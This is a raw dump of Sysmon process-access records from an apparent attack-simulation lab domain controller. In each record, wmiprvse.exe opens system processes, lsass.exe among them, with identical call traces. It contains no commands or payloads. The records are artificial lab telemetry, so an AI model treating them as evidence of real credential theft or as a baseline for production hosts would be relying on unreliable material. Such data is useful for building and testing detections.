13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005564Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005563Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005562Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005561Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005560Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.891{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005559Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005558Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.875{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 